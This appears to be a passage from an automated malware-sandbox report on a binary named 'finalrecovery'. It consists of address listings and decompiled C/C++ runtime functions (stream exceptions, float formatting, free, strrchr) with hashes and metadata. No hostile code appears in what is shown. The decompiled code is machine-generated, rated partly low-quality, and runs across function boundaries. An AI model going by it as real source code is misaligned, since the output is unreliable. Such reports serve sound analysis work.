0x10007ecc
0x10007ecc
0x10007ecc
0x10007eb9
0x10007eba
0x10007ebf
0x10007ec2
0x10007ed1
0x10007ed7
0x00000000
0x10007eda
0x10007e7b
0x10007e7b
0x10007e81
0x10007e86
0x10007e89
0x10007e8b
0x10007edd
0x10007edf
0x10007ee0
0x10007ee1
0x10007ee2
0x10007ee3
0x10007ee4
0x10007ee9
0x10007eec
0x10007eed
0x10007eef
0x10007ef5
0x10007efc
0x10007eff
0x10007f02
0x10007f05
0x10007f06
0x10007f07
0x10007f0a
0x10007f10
0x10007f12
0x10007f14
0x10007f14
0x10007f16
0x10007f18
0x00000000
0x00000000
0x10007f1a
0x10007f1c
0x10007f1e
0x10007f20
0x10007f2b
0x10007f2d
0x10007f2f
0x00000000
0x00000000
0x10007f2f
0x10007f20
0x00000000
0x10007f1c
0x10007f31
0x10007f31
0x10007f37
0x10007f39
0x10007f3f
0x10007f41
0x10007f63
0x10007f63
0x10007f65
0x10007f67
0x10007f73
0x10007f73
0x10007f69
0x10007f69
0x10007f6b
0x00000000
0x10007f6d
0x10007f6d
0x10007f6f
0x10007f71
0x00000000
0x00000000
0x10007f71
0x10007f6b
0x10007f7b
0x10007f83
0x10007f89
0x10007f8a
0x10007f8c
0x10007f94
0x10007f9a
0x10007fa0
0x10007fa6
0x10007fba
0x10007fbf
0x10007fca
0x10007fda
0x10007fe0
0x10007fe2
0x10007fe5
0x10008008
0x10008008
0x1000800d
0x10008013
0x10008013
0x10008019
0x1000801f
0x10008025
0x1000802b
0x10008031
0x10008052
0x10008057
0x1000805c
0x10008060
0x10008066
0x10008069
0x1000807c
0x1000807c
0x10008082
0x10008088
0x10008089
0x1000808a
0x1000808f
0x10008092
0x10008098
0x1000809a
0x100080f8
0x100080fe
0x10008106
0x1000810b
0x10008111
0x10008112
0x00000000
0x00000000
0x00000000
0x1000806b
0x1000806b
0x1000806e
0x10008070
0x00000000
0x10008072
0x10008072
0x10008075
0x00000000
0x10008077
0x10008077
0x1000807a
0x00000000
0x00000000
0x00000000
0x00000000
0x1000807a
0x10008075
0x10008070
0x10008114
0x10008115
0x00000000
0x1000809c
0x1000809c
0x100080a2
0x100080aa
0x100080af
0x100080be
0x100080be
0x100080c6
0x100080cc
0x100080d2
0x100080d9
0x100080dc
0x100080de
0x100080ee
0x100080f3
0x00000000
0x10007fe7
0x10007fe7
0x10007fed
0x10007fee
0x10007fef
0x10007ff0
0x10007ff8
0x10007ff8
0x1000811b
0x1000811b
0x10008122
0x10008123
0x1000812b
0x10008130
0x10008131
0x10007f43
0x10007f43
0x10007f46
0x10007f48
0x10007f5d
0x00000000
0x10007f4a
0x10007f4a
0x10007f4d
0x10007f4e
0x10007f4f
0x10007f50
0x10007f55
0x10007f48
0x10008136
0x10008137
0x10008139
0x10008140
0x00000000
0x00000000
0x00000000
0x10007e8b
0x10007e5e
0x10007e60
0x10007e61
0x10007e63
0x10007e63
0x00000000
0x00000000
0x00000000
0x00000000
0x10007dbc
0x10007dbc
0x10007dc2
0x10007dc5
0x10007dc8
0x10007dcb
0x10007dce
0x10007dd1
0x10007dd4
0x10007dd4
0x00000000
0x10007d85
0x10007d53
0x10007d53
0x10007d56
0x10007de3
0x10007de4
0x10007de9
0x00000000
0x10007de9
0x10007c8a
0x10007c8a
0x10007c8d
0x10007c95
0x10007c98
0x10007c9f
0x10007ca1
0x10007ca3
0x10007cbe
0x10007cbf
0x10007cc0
0x10007cc1
0x10007cc6
0x10007cc9
0x10007ccc
0x10007ca5
0x10007ca5
0x10007ca8
0x10007ca9
0x10007caa
0x10007cab
0x10007cac
0x10007cb1
0x10007cb3
0x10007cb6
0x10007cb6
0x10007cce
0x10007cd0
0x00000000
0x00000000
0x10007cd9
0x10007cdc
0x10007cdf
0x10007ce1
0x10007ce3
0x00000000
0x10007ce5
0x10007ce5
0x10007ce8
0x00000000
0x10007ce8
0x00000000
0x10007ce3
0x10007d5e
0x10007dea
0x10007ded
0x10007df1
0x10007dfa
0x10007dfd
0x10007e01
0x10007e01
0x10007e03
0x10007e06
0x10007e08
0x10007e0a
0x10007e0c
0x10007e11
0x10007e12
0x10007e16
0x10007e16
0x10007e1a
0x10007e1d
0x10007e1d
0x10007e21
0x00000000
0x10007e28
0x10007c5a
0x10007c5a
0x10007c61
0x10007c62
0x10007c64
0x10007e29
0x10007e2d
0x10007e2d
0x00000000

APIs

_free.LIBCMT ref: 10007DE4

Strings

*?, xrefs: 10007C8D

Memory Dump Source

Source File: 00000002.00000002.324049743.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.324045427.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.324060416.0000000010010000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.324067694.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_finalrecovery.jbxd

Similarity

API ID: _free
String ID: *?
API String ID: 269201875-2564092906
Opcode ID: 5cf7f851aaec087829ec43eeaab6f60b67ed4c75ee81a41c35adb74eb9a8a420
Instruction ID: 6030054bbf8e3b8e584a94badc09da72dadf6250b8f4ad042cf585a859addb16
Opcode Fuzzy Hash: 5cf7f851aaec087829ec43eeaab6f60b67ed4c75ee81a41c35adb74eb9a8a420
Instruction Fuzzy Hash: 4E616075D0021A9FEB15CFA8C8819EDFBF5FF48390B25816AE808E7305D735AE418B90

Uniqueness

Uniqueness Score: -1.00%

Function 00404280 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 140
COMMON

Download Yara Rule

C-Code - Quality: 65%

			E00404280(void* __ebx, intOrPtr* __ecx, char _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				char _v16;
				intOrPtr* _v20;
				intOrPtr _v24;
				char _v28;
				char _v44;
				signed int _v64;
				char _v92;
				char _v100;
				intOrPtr _v116;
				void* __edi;
				void* __ebp;
				signed int _t40;
				intOrPtr* _t43;
				intOrPtr _t45;
				intOrPtr _t50;
				signed int _t56;
				intOrPtr _t69;
				intOrPtr* _t72;
				intOrPtr _t78;
				signed char _t80;
				intOrPtr* _t82;
				intOrPtr _t85;
				void* _t86;
				char* _t88;
				intOrPtr _t90;
				intOrPtr* _t92;
				intOrPtr* _t95;
				intOrPtr _t97;
				void* _t100;
				void* _t102;
				void* _t103;

				_push(0xffffffff);
				_push(0x42c3dd);
				_push( *[fs:0x0]);
				_t103 = _t102 - 0x1c;
				_t40 =  *0x43d054; // 0x8e1b5714
				_push(_t40 ^ _t99);
				 *[fs:0x0] =  &_v16;
				_t95 = __ecx;
				_v20 = __ecx;
				_t43 = _a8;
				_t84 = _a4;
				_t72 = _a4;
				_v20 = __ecx;
				_v44 = 0;
				_t90 =  *_t43;
				_t7 = _t43 + 4; // 0x24448d00
				_t69 =  *_t7;
				_v28 = 0;
				_v24 = 0xf;
				_v44 = 0;
				_v20 = _t72 + 1;
				do {
					_t45 =  *_t72;
					_t72 = _t72 + 1;
				} while (_t45 != 0);
				E004026C0(_t69,  &_v44, _t84, _t72 - _v20);
				_push(_t69);
				_push(_t90);
				_v8 = 0;
				E00403B40(_t69, __ecx, _t84, _t90,  &_v44);
				_t85 = _v24;
				if(_t85 < 0x10) {
					L6:
					 *_t95 = 0x439d14;
					 *[fs:0x0] = _v16;
					return _t95;
				} else {
					_t78 = _v44;
					_t86 = _t85 + 1;
					_t50 = _t78;
					if(_t86 < 0x1000) {
						L5:
						_push(_t86);
						E0040ED7F(_t78);
						goto L6;
					} else {
						_t78 =  *((intOrPtr*)(_t78 - 4));
						_t86 = _t86 + 0x23;
						if(_t50 - _t78 + 0xfffffffc > 0x1f) {
							E004134A7(_t69, _t86, __eflags);
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							_t100 = _t103;
							_t56 = _v64 & 0x00000017;
							 *(_t78 + 0xc) = _t56;
							_t80 =  *(_t78 + 0x10) & _t56;
							__eflags = _t80;
							if(_t80 == 0) {
								return _t56;
							} else {
								__eflags = _a4;
								if(_a4 != 0) {
									E004103CB(0, 0);
								}
								__eflags = _t80 & 0x00000004;
								if((_t80 & 0x00000004) == 0) {
									__eflags = _t80 & 0x00000002;
									_t88 =  ==  ? "ios_base::eofbit set" : "ios_base::failbit set";
								} else {
									_t88 = "ios_base::badbit set";
								}
								_push(E00403B30( &_v100));
								_t82 =  &_v92;
								E00404280(_t69, _t82, _t88);
								E004103CB( &_v100, 0x43c040);
								asm("int3");
								_push(_t100);
								_push(_t95);
								_t97 = _v116;
								asm("xorps xmm0, xmm0");
								_push(_t90);
								_t92 = _t82;
								 *_t92 = 0x42e2d4;
								asm("movq [eax], xmm0");
								_t34 = _t97 + 4; // 0x4
								E0040FEF1(_t34, _t92 + 4);
								 *_t92 = 0x439c9c;
								 *((intOrPtr*)(_t92 + 0xc)) =  *((intOrPtr*)(_t97 + 0xc));
								 *((intOrPtr*)(_t92 + 0x10)) =  *((intOrPtr*)(_t97 + 0x10));
								 *_t92 = 0x439d14;
								return _t92;
							}
						} else {
							goto L5;
						}
					}
				}
			}

0x00404283
0x00404285
0x00404290
0x00404291
0x00404297
0x0040429e
0x004042a2
0x004042a8
0x004042aa
0x004042ad
0x004042b0
0x004042b3
0x004042b5
0x004042b8
0x004042bf
0x004042c1
0x004042c1
0x004042c7
0x004042ce
0x004042d5
0x004042d9
0x004042e0
0x004042e0
0x004042e2
0x004042e3
0x004042ef
0x004042f4
0x004042f5
0x004042f9
0x00404303
0x00404308
0x0040430e
0x00404338
0x00404338
0x00404343
0x00404351
0x00404310
0x00404310
0x00404313
0x00404314
0x0040431c
0x0040432e
0x0040432e
0x00404330
0x00000000
0x0040431e
0x0040431e
0x00404321
0x0040432c
0x00404354
0x00404359
0x0040435a
0x0040435b
0x0040435c
0x0040435d
0x0040435e
0x0040435f
0x00404361
0x0040436c
0x0040436f
0x00404375
0x00404375
0x00404377
0x00404384
0x00404379
0x00404379
0x0040437d
0x0040438b
0x0040438b
0x00404390
0x00404393
0x0040439c
0x004043a9
0x00404395
0x00404395
0x00404395
0x004043b5
0x004043b7
0x004043bb
0x004043ca
0x004043cf
0x004043d0
0x004043d3
0x004043d4
0x004043d7
0x004043da
0x004043db
0x004043e1
0x004043e7
0x004043eb
0x004043ef
0x004043f4
0x00404403
0x00404408
0x0040440b
0x00404414
0x00404414
0x00000000
0x00000000
0x00000000
0x0040432c
0x0040431c

APIs

___std_exception_copy.LIBVCRUNTIME ref: 004043EF

Part of subcall function 004103CB: RaiseException.KERNEL32(E06D7363,00000001,00000003,?,?,?,0040DFB5,?,0043B72C,?), ref: 0041042B

Strings

`=@, xrefs: 004043F4
`=@, xrefs: 00404338, 0040440B
ios_base::badbit set, xrefs: 00404395

Memory Dump Source

Source File: 00000002.00000002.323409231.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.323409231.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_finalrecovery.jbxd

Yara matches

Similarity

API ID: ExceptionRaise___std_exception_copy
String ID: `=@$`=@$ios_base::badbit set
API String ID: 3109751735-2632860996
Opcode ID: 7822fc5aab85087ebeee28f7d0f364b89187b18a305f8251706e3995b777d4ce
Instruction ID: 6dd13d2665102ae89cf96e71732bc0c741d845f7784690c46fe42d92c4b9a4e0
Opcode Fuzzy Hash: 7822fc5aab85087ebeee28f7d0f364b89187b18a305f8251706e3995b777d4ce
Instruction Fuzzy Hash: 2B41C4B16002089BC714DF59D841B9EFBF8EF49314F14852FF915A7681D778A944CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 0044224E Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 99COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 004422C6

Strings

&D, xrefs: 0044227E
&D, xrefs: 004422A5

Memory Dump Source

Source File: 00000002.00000002.323409231.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.323409231.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_finalrecovery.jbxd

Yara matches

Similarity

API ID: _free
String ID: &D$&D
API String ID: 269201875-2592082244
Opcode ID: 60f1fd40a803f3d3a22cc48b7bffbfa3b0681c551b6ad4760c9688dfd2d8259c
Instruction ID: 5fcc14ea718add966b4376e3b2dea8e8802bdcb913fecaa543de9abcf6840687
Opcode Fuzzy Hash: 60f1fd40a803f3d3a22cc48b7bffbfa3b0681c551b6ad4760c9688dfd2d8259c
Instruction Fuzzy Hash: 1F319071900209AFEB00DFA9C940A9B77B4FF44314F50406AF914A72A1EBB99D51CB68

Uniqueness

Uniqueness Score: -1.00%

Function 0041F0B9 Relevance: 6.3, APIs: 4, Instructions: 320
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E0041F0B9(void* __edx, signed int* _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, signed int _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40) {
				signed int _v5;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				unsigned int _v24;
				signed int _v32;
				signed int _v40;
				char _v48;
				intOrPtr _v56;
				char _v60;
				void* __ebx;
				void* __edi;
				signed char _t85;
				void* _t91;
				signed int _t95;
				signed int _t97;
				signed int _t98;
				signed int _t99;
				signed int _t104;
				signed int _t105;
				void* _t106;
				signed int _t107;
				void* _t108;
				void* _t110;
				void* _t113;
				void* _t115;
				signed int _t117;
				signed int* _t118;
				void* _t121;
				signed int _t123;
				signed int _t129;
				signed int* _t130;
				signed int* _t133;
				signed int _t134;
				signed int _t137;
				signed int _t139;
				signed int _t141;
				signed int _t146;
				signed int _t147;
				signed int _t149;
				signed int _t150;
				void* _t154;
				unsigned int _t155;
				signed int _t162;
				void* _t163;
				signed int _t164;
				signed int* _t165;
				signed int _t168;
				signed int _t173;
				signed int _t174;
				signed int _t175;
				signed int _t177;
				signed int _t178;
				signed int _t179;
				void* _t181;

				_t163 = __edx;
				_t173 = _a24;
				if(_t173 < 0) {
					_t173 = 0;
				}
				_t177 = _a8;
				 *_t177 = 0;
				E004135A1( &_v60, _t163, _a36);
				_t5 = _t173 + 0xb; // 0xb
				_t185 = _a12 - _t5;
				if(_a12 > _t5) {
					_t133 = _a4;
					_t139 = _t133[1];
					_t164 =  *_t133;
					__eflags = (_t139 >> 0x00000014 & 0x000007ff) - 0x7ff;
					if((_t139 >> 0x00000014 & 0x000007ff) != 0x7ff) {
						__eflags = _t139;
						if(__eflags > 0) {
							L14:
							_t18 = _t177 + 1; // 0x2
							_t165 = _t18;
							_t85 = _a28 ^ 0x00000001;
							_v16 = 0x3ff;
							_v5 = _t85;
							_v40 = _t165;
							_v32 = ((_t85 & 0x000000ff) << 5) + 7;
							__eflags = _t139 & 0x7ff00000;
							_t91 = 0x30;
							if((_t139 & 0x7ff00000) != 0) {
								 *_t177 = 0x31;
								L19:
								_t141 = 0;
								__eflags = 0;
								L20:
								_t26 =  &(_t165[0]); // 0x2
								_t178 = _t26;
								_v12 = _t178;
								__eflags = _t173;
								if(_t173 != 0) {
									_t95 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v56 + 0x88))))));
								} else {
									_t95 = _t141;
								}
								 *_t165 = _t95;
								_t97 = _t133[1] & 0x000fffff;
								__eflags = _t97;
								_v24 = _t97;
								if(_t97 > 0) {
									L25:
									_t166 = _t141;
									_t142 = 0xf0000;
									_t98 = 0x30;
									_v12 = _t98;
									_v20 = _t141;
									_v24 = 0xf0000;
									do {
										__eflags = _t173;
										if(_t173 <= 0) {
											break;
										}
										_t121 = E0042BEC0( *_t133 & _t166, _v12, _t133[1] & _t142 & 0x000fffff);
										_t154 = 0x30;
										_t123 = _t121 + _t154 & 0x0000ffff;
										__eflags = _t123 - 0x39;
										if(_t123 > 0x39) {
											_t123 = _t123 + _v32;
											__eflags = _t123;
										}
										_t155 = _v24;
										_t166 = (_t155 << 0x00000020 | _v20) >> 4;
										 *_t178 = _t123;
										_t178 = _t178 + 1;
										_t142 = _t155 >> 4;
										_t98 = _v12 - 4;
										_t173 = _t173 - 1;
										_v20 = (_t155 << 0x00000020 | _v20) >> 4;
										_v24 = _t155 >> 4;
										_v12 = _t98;
										__eflags = _t98;
									} while (_t98 >= 0);
									_v12 = _t178;
									__eflags = _t98;
									if(__eflags < 0) {
										goto L42;
									}
									_t117 = E0041F8D4(__eflags, _t133, _t166, _t142, _t98, _a40);
									_t181 = _t181 + 0x14;
									__eflags = _t117;
									if(_t117 == 0) {
										goto L42;
									}
									_t50 = _t178 - 1; // 0x2
									_t118 = _t50;
									_t137 = 0x30;
									while(1) {
										_t149 =  *_t118;
										__eflags = _t149 - 0x66;
										if(_t149 == 0x66) {
											goto L35;
										}
										__eflags = _t149 - 0x46;
										if(_t149 != 0x46) {
											_t133 = _a4;
											__eflags = _t118 - _v40;
											if(_t118 == _v40) {
												_t54 = _t118 - 1;
												 *_t54 =  *(_t118 - 1) + 1;
												__eflags =  *_t54;
											} else {
												__eflags = _t149 - 0x39;
												if(_t149 != 0x39) {
													_t150 = _t149 + 1;
													__eflags = _t150;
												} else {
													_t150 = _v32 + 0x3a;
												}
												 *_t118 = _t150;
											}
											goto L42;
										}
										L35:
										 *_t118 = _t137;
										_t118 = _t118 - 1;
									}
								} else {
									__eflags =  *_t133 - _t141;
									if( *_t133 <= _t141) {
										L42:
										__eflags = _t173;
										if(_t173 > 0) {
											_push(_t173);
											_t115 = 0x30;
											_push(_t115);
											_push(_t178);
											E00410A80(_t173);
											_t178 = _t178 + _t173;
											__eflags = _t178;
											_v12 = _t178;
										}
										_t99 = _v40;
										__eflags =  *_t99;
										if( *_t99 == 0) {
											_t178 = _t99;
											_v12 = _t178;
										}
										 *_t178 = (_v5 << 5) + 0x50;
										_t104 = E0042BEC0( *_t133, 0x34, _t133[1]);
										_t179 = 0;
										_t105 = _v12;
										_t146 = (_t104 & 0x000007ff) - _v16;
										__eflags = _t146;
										asm("sbb esi, esi");
										_t168 = _t105 + 2;
										_v40 = _t168;
										if(__eflags < 0) {
											L50:
											_t146 =  ~_t146;
											asm("adc esi, 0x0");
											_t179 =  ~_t179;
											_t134 = 0x2d;
											goto L51;
										} else {
											if(__eflags > 0) {
												L49:
												_t134 = 0x2b;
												L51:
												 *(_t105 + 1) = _t134;
												_t174 = _t168;
												_t106 = 0x30;
												 *_t168 = _t106;
												_t107 = 0;
												__eflags = _t179;
												if(__eflags < 0) {
													L55:
													__eflags = _t174 - _t168;
													if(_t174 != _t168) {
														L59:
														_push(_t134);
														_push(_t107);
														_push(0x64);
														_push(_t179);
														_t108 = E0042BDC0();
														_t179 = _t134;
														_t134 = _t146;
														_v32 = _t168;
														_t168 = _v40;
														 *_t174 = _t108 + 0x30;
														_t174 = _t174 + 1;
														_t107 = 0;
														__eflags = 0;
														L60:
														__eflags = _t174 - _t168;
														if(_t174 != _t168) {
															L64:
															_push(_t134);
															_push(_t107);
															_push(0xa);
															_push(_t179);
															_push(_t146);
															_t110 = E0042BDC0();
															_v40 = _t168;
															 *_t174 = _t110 + 0x30;
															_t174 = _t174 + 1;
															_t107 = 0;
															__eflags = 0;
															L65:
															_t147 = _t146 + 0x30;
															__eflags = _t147;
															 *_t174 = _t147;
															 *(_t174 + 1) = _t107;
															_t175 = _t107;
															L66:
															if(_v48 != 0) {
																 *(_v60 + 0x350) =  *(_v60 + 0x350) & 0xfffffffd;
															}
															return _t175;
														}
														__eflags = _t179 - _t107;
														if(__eflags < 0) {
															goto L65;
														}
														if(__eflags > 0) {
															goto L64;
														}
														__eflags = _t146 - 0xa;
														if(_t146 < 0xa) {
															goto L65;
														}
														goto L64;
													}
													__eflags = _t179 - _t107;
													if(__eflags < 0) {
														goto L60;
													}
													if(__eflags > 0) {
														goto L59;
													}
													__eflags = _t146 - 0x64;
													if(_t146 < 0x64) {
														goto L60;
													}
													goto L59;
												}
												_t134 = 0x3e8;
												if(__eflags > 0) {
													L54:
													_push(_t134);
													_push(_t107);
													_push(_t134);
													_push(_t179);
													_t113 = E0042BDC0();
													_t179 = _t134;
													_t134 = _t146;
													_v32 = _t168;
													_t168 = _v40;
													 *_t168 = _t113 + 0x30;
													_t174 = _t168 + 1;
													_t107 = 0;
													__eflags = 0;
													goto L55;
												}
												__eflags = _t146 - 0x3e8;
												if(_t146 < 0x3e8) {
													goto L55;
												}
												goto L54;
											}
											__eflags = _t146;
											if(_t146 < 0) {
												goto L50;
											}
											goto L49;
										}
									}
									goto L25;
								}
							}
							 *_t177 = _t91;
							_t141 =  *_t133 | _t133[1] & 0x000fffff;
							__eflags = _t141;
							if(_t141 != 0) {
								_v16 = 0x3fe;
								goto L19;
							}
							_v16 = _t141;
							goto L20;
						}
						if(__eflags < 0) {
							L13:
							 *_t177 = 0x2d;
							_t177 = _t177 + 1;
							__eflags = _t177;
							_t139 = _t133[1];
							goto L14;
						}
						__eflags = _t164;
						if(_t164 >= 0) {
							goto L14;
						}
						goto L13;
					}
					_t175 = E0041F3C8(_t133, _t139, _t164, _t133, _t177, _a12, _a16, _a20, _t173, 0, _a32, 0, _a40);
					__eflags = _t175;
					if(_t175 == 0) {
						_t129 = E0042BF70(_t177, 0x65);
						__eflags = _t129;
						if(_t129 != 0) {
							_t162 = ((_a28 ^ 0x00000001) << 5) + 0x50;
							__eflags = _t162;
							 *_t129 = _t162;
							 *((char*)(_t129 + 3)) = 0;
						}
						_t175 = 0;
					} else {
						 *_t177 = 0;
					}
					goto L66;
				}
				_t130 = E00413571(_t185);
				_t175 = 0x22;
				 *_t130 = _t175;
				E00413497();
				goto L66;
			}

0x0041f0b9
0x0041f0c4
0x0041f0c9
0x0041f0cb
0x0041f0cb
0x0041f0cf
0x0041f0d8
0x0041f0da
0x0041f0df
0x0041f0e2
0x0041f0e5
0x0041f0fb
0x0041f0fe
0x0041f103
0x0041f10d
0x0041f112
0x0041f169
0x0041f16b
0x0041f17a
0x0041f17d
0x0041f17d
0x0041f180
0x0041f182
0x0041f189
0x0041f19b
0x0041f19e
0x0041f1a3
0x0041f1a7
0x0041f1a8
0x0041f1c8
0x0041f1cb
0x0041f1cb
0x0041f1cb
0x0041f1cd
0x0041f1cd
0x0041f1cd
0x0041f1d0
0x0041f1d3
0x0041f1d5
0x0041f1e6
0x0041f1d7
0x0041f1d7
0x0041f1d7
0x0041f1e8
0x0041f1ed
0x0041f1ed
0x0041f1f2
0x0041f1f5
0x0041f1ff
0x0041f201
0x0041f203
0x0041f208
0x0041f209
0x0041f20c
0x0041f20f
0x0041f212
0x0041f212
0x0041f214
0x00000000
0x00000000
0x0041f22b
0x0041f232
0x0041f236
0x0041f239
0x0041f23c
0x0041f23e
0x0041f23e
0x0041f23e
0x0041f244
0x0041f247
0x0041f24b
0x0041f24d
0x0041f251
0x0041f254
0x0041f257
0x0041f258
0x0041f25b
0x0041f25e
0x0041f261
0x0041f261
0x0041f266
0x0041f269
0x0041f26c
0x00000000
0x00000000
0x0041f275
0x0041f27a
0x0041f27d
0x0041f27f
0x00000000
0x00000000
0x0041f283
0x0041f283
0x0041f286
0x0041f287
0x0041f287
0x0041f289
0x0041f28c
0x00000000
0x00000000
0x0041f28e
0x0041f291
0x0041f298
0x0041f29b
0x0041f29e
0x0041f2b3
0x0041f2b3
0x0041f2b3
0x0041f2a0
0x0041f2a0
0x0041f2a3
0x0041f2ad
0x0041f2ad
0x0041f2a5
0x0041f2a8
0x0041f2a8
0x0041f2af
0x0041f2af
0x00000000
0x0041f29e
0x0041f293
0x0041f293
0x0041f295
0x0041f295
0x0041f1f7
0x0041f1f7
0x0041f1f9
0x0041f2b6
0x0041f2b6
0x0041f2b8
0x0041f2ba
0x0041f2bd
0x0041f2be
0x0041f2bf
0x0041f2c0
0x0041f2c8
0x0041f2c8
0x0041f2ca
0x0041f2ca
0x0041f2cd
0x0041f2d0
0x0041f2d3
0x0041f2d5
0x0041f2d7
0x0041f2d7
0x0041f2e4
0x0041f2eb
0x0041f2f2
0x0041f2f4
0x0041f2fd
0x0041f2fd
0x0041f300
0x0041f302
0x0041f305
0x0041f308
0x0041f314
0x0041f314
0x0041f318
0x0041f31b
0x0041f31d
0x00000000
0x0041f30a
0x0041f30a
0x0041f310
0x0041f310
0x0041f31e
0x0041f31e
0x0041f321
0x0041f325
0x0041f326
0x0041f328
0x0041f32a
0x0041f32c
0x0041f356
0x0041f356
0x0041f358
0x0041f365
0x0041f365
0x0041f366
0x0041f367
0x0041f369
0x0041f36b
0x0041f370
0x0041f372
0x0041f376
0x0041f379
0x0041f37c
0x0041f37e
0x0041f37f
0x0041f37f
0x0041f381
0x0041f381
0x0041f383
0x0041f390
0x0041f390
0x0041f391
0x0041f392
0x0041f394
0x0041f395
0x0041f396
0x0041f39f
0x0041f3a2
0x0041f3a4
0x0041f3a5
0x0041f3a5
0x0041f3a7
0x0041f3a7
0x0041f3a7
0x0041f3aa
0x0041f3ac
0x0041f3af
0x0041f3b1
0x0041f3b7
0x0041f3bc
0x0041f3bc
0x0041f3c7
0x0041f3c7
0x0041f385
0x0041f387
0x00000000
0x00000000
0x0041f389
0x00000000
0x00000000
0x0041f38b
0x0041f38e
0x00000000
0x00000000
0x00000000
0x0041f38e
0x0041f35a
0x0041f35c
0x00000000
0x00000000
0x0041f35e
0x00000000
0x00000000
0x0041f360
0x0041f363
0x00000000
0x00000000
0x00000000
0x0041f363
0x0041f32e
0x0041f333
0x0041f339
0x0041f339
0x0041f33a
0x0041f33b
0x0041f33c
0x0041f33e
0x0041f343
0x0041f345
0x0041f347
0x0041f34c
0x0041f34f
0x0041f351
0x0041f354
0x0041f354
0x00000000
0x0041f354
0x0041f335
0x0041f337
0x00000000
0x00000000
0x00000000
0x0041f337
0x0041f30c
0x0041f30e
0x00000000
0x00000000
0x00000000
0x0041f30e
0x0041f308
0x00000000
0x0041f1f9
0x0041f1f5
0x0041f1aa
0x0041f1b6
0x0041f1b6
0x0041f1b8
0x0041f1bf
0x00000000
0x0041f1bf
0x0041f1ba
0x00000000
0x0041f1ba
0x0041f16d
0x0041f173
0x0041f173
0x0041f176
0x0041f176
0x0041f177
0x00000000
0x0041f177
0x0041f16f
0x0041f171
0x00000000
0x00000000
0x00000000
0x0041f171
0x0041f12f
0x0041f134
0x0041f136
0x0041f143
0x0041f14a
0x0041f14c
0x0041f157
0x0041f157
0x0041f15a
0x0041f15c
0x0041f15c
0x0041f160
0x0041f138
0x0041f138
0x0041f138
0x00000000
0x0041f136
0x0041f0e7
0x0041f0ee
0x0041f0ef
0x0041f0f1
0x00000000

APIs

_strrchr.LIBCMT ref: 0041F143

Memory Dump Source

Source File: 00000002.00000002.323409231.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.323409231.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_finalrecovery.jbxd

Yara matches

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: ea010ae931ad1b145e5fd3dfd9d8e6290a85c3b5d9bd79e2341eb9072933dd63
Instruction ID: 3f0e62c73651a2c9c53a00de66904055b7a86afd20e6f85283592e7e52a0447b
Opcode Fuzzy Hash: ea010ae931ad1b145e5fd3dfd9d8e6290a85c3b5d9bd79e2341eb9072933dd63
Instruction Fuzzy Hash: DAB136729002499FDB11CF28C8817EFBBA5EF45350F2441BBE8559B342D2399D87CB68

Uniqueness

Uniqueness Score: -1.00%

Function 00411E3B Relevance: 6.2, APIs: 4, Instructions: 168
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 67%

			E00411E3B(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int* _t52;
				signed int _t53;
				intOrPtr _t54;
				signed int _t58;
				signed int _t61;
				intOrPtr _t71;
				signed int _t75;
				signed int _t79;
				signed int _t81;
				signed int _t84;
				signed int _t85;
				signed int _t97;
				signed int* _t98;
				signed char* _t101;
				signed int _t107;
				void* _t111;

				_push(0x10);
				_push(0x43b8f8);
				E0040F960(__ebx, __edi, __esi);
				_t75 = 0;
				_t52 =  *(_t111 + 0x10);
				_t81 = _t52[1];
				if(_t81 == 0 ||  *((intOrPtr*)(_t81 + 8)) == 0) {
					L30:
					_t53 = 0;
					__eflags = 0;
					goto L31;
				} else {
					_t97 = _t52[2];
					if(_t97 != 0 ||  *_t52 < 0) {
						_t84 =  *_t52;
						_t107 =  *(_t111 + 0xc);
						if(_t84 >= 0) {
							_t107 = _t107 + 0xc + _t97;
						}
						 *(_t111 - 4) = _t75;
						_t101 =  *(_t111 + 0x14);
						if(_t84 >= 0 || ( *_t101 & 0x00000010) == 0) {
							L10:
							_t54 =  *((intOrPtr*)(_t111 + 8));
							__eflags = _t84 & 0x00000008;
							if((_t84 & 0x00000008) == 0) {
								__eflags =  *_t101 & 0x00000001;
								if(( *_t101 & 0x00000001) == 0) {
									_t84 =  *(_t54 + 0x18);
									__eflags = _t101[0x18] - _t75;
									if(_t101[0x18] != _t75) {
										__eflags = _t84;
										if(_t84 == 0) {
											goto L32;
										} else {
											__eflags = _t107;
											if(_t107 == 0) {
												goto L32;
											} else {
												__eflags =  *_t101 & 0x00000004;
												_t79 = 0;
												_t75 = (_t79 & 0xffffff00 | ( *_t101 & 0x00000004) != 0x00000000) + 1;
												__eflags = _t75;
												 *(_t111 - 0x20) = _t75;
												goto L29;
											}
										}
									} else {
										__eflags = _t84;
